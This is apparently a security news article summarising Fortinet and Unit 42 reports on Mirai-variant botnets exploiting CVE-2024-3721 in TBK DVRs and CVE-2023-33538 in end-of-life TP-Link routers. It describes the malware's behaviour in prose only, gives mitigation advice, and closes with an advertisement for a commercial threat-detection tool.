Findings, Fortinet FortiGuard Labs & Palo Alto Networks, Unit 42
|
Threat actors are taking advantage of security holes in TBK DVR and end-of-life (EoL) devices. Mirai-botnet variations will be deployed on hacked devices by TP-Link Wi-Fi routers. |
CVE-2024-3721 (CVSS score: 6.3), a medium-severity command injection vulnerability affecting TBK DVR-4104 and DVR-4216 digital video recording devices, has been reported to be exploited by the attack targeting TBK DVR devices to distribute a Mirai version known as Nexcorium.
Vincent Li, Security Researcher
|
"Due to their extensive use, lack of updating, and frequently inadequate security settings, IoT devices are becoming more and more popular targets for large-scale assaults." "To obtain initial access and install malware that can endure, propagate, and result in distributed denial-of-service (DDoS) assaults, threat actors continue to take advantage of known vulnerabilities." |
The vulnerability has previously been used in the wild. The security flaw has been used over the past year to launch both a unique, relatively new botnet known as RondoDox and a Mirai derivative.
A large-scale loader-as-a-service botnet that has been disseminating RondoDox, Mirai, and Morte payloads via weak credentials and outdated vulnerabilities in routers, IoT devices, and enterprise apps was also revealed by CloudSEK in September 2025.
According to Fortinet, the attack activity entails using CVE-2024-3721 to retrieve and drop a downloader script, which subsequently launches the botnet payload based on the architecture of the Linux system. The malware displays the statement "nexuscorp has taken control" when it has finished running.
Security Vendor
|
"Nexcorium's architecture, which includes a watchdog module, DDoS attack module, and XOR-encoded configuration table initialization, is comparable to that of the Mirai variation." |
The malware also contains a list of hard-coded usernames and passwords for use in brute-force attacks that target the victim's hosts by establishing a Telnet connection, as well as an exploit for CVE-2017-17215 to target Huawei HG532 devices on the network.
If the Telnet login is successful, it tries to get a shell, use systemd service and crontab to set up persistence, and connect to an external server to wait for commands to start DDoS attacks over UDP, TCP, and SMTP.
The malware erases the original downloaded binary to avoid detection once persistence has been established on the device.
Fortinet
|
"To maintain long-term access to compromised computers, the Nexcorium virus combines vulnerability exploitation, support for diverse architectures, and a variety of persistence techniques. These characteristics are typical of contemporary IoT-focused botnets." "Its broad brute-force capabilities and utilization of known exploits, such as CVE-2017-17215, highlight its versatility and effectiveness in expanding its infection reach." |
The development coincides with Unit 42's announcement that it found active, automated scans and probes trying to take advantage of CVE-2023-33538 (CVSS score: 8.8), a command injection vulnerability affecting EoL TP-Link wireless routers, albeit with a poor strategy that doesn't lead to a successful compromise.
Notably, in June 2025, the security vulnerability was included in the Known Exploited Vulnerabilities (KEV) list maintained by the U.S. Cybersecurity and Infrastructure Security Agency (CISA).
The vulnerability affects the following models:
● TL-WR940N v2 and v4
● TL-WR740N v1 and v2
● TL-WR841N v8 and v10
Asher Davila, Malav Vyas, and Chris Navarrete, Researchers
|
"Our investigation verifies the existence of the underlying vulnerability even if the in-the-wild assaults we saw were faulty and would not succeed." "Authentication to the router's web interface is necessary for successful exploitation." |
In this instance, the attacks aim to install a botnet malware similar to Mirai, and the source code contains multiple references to the string "Condi." Additionally, it has the capacity to update itself with a newer version and function as a web server to disseminate the infection to other connected devices.
Users are encouraged to replace the impacted TP-Link devices with a newer model and make sure that default credentials are not used, as these devices are no longer actively maintained.
Unit 42
|
"The ongoing danger of default credentials in IoT devices will continue to influence the security environment for some time to come." "For dedicated attackers, these credentials have the potential to transform a restricted, authenticated vulnerability into a crucial access point." |
Conclusion
Now that we have talked about CVE-2024-3721 Exploited by Mirai Variant Nexcorium to Hijack TBK DVRs for DDoS Botnet, you might want to protect your working environment from unknown cybersecurity threats.
For that, you can get in contact with Craw Security, offering a dedicated threat detection tool, “ThreatFusionAI.” This amazing tool uses the latest detection features to detect AI-based cyberattacks and malicious attempts.
After that, organizations will not need to continuously go through various processes to locate vulnerabilities and suspicious activities. What are you waiting for? Contact, Now
Read More: